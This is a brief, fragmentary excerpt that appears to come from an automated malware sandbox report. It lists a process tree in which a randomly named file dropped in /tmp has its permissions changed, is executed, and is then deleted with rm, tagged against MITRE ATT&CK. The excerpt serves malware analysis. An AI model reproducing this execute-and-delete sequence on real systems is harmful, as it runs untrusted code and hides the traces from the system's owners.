- File and Directory Permissions Modification
PID:1018
-
-
/tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b./nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-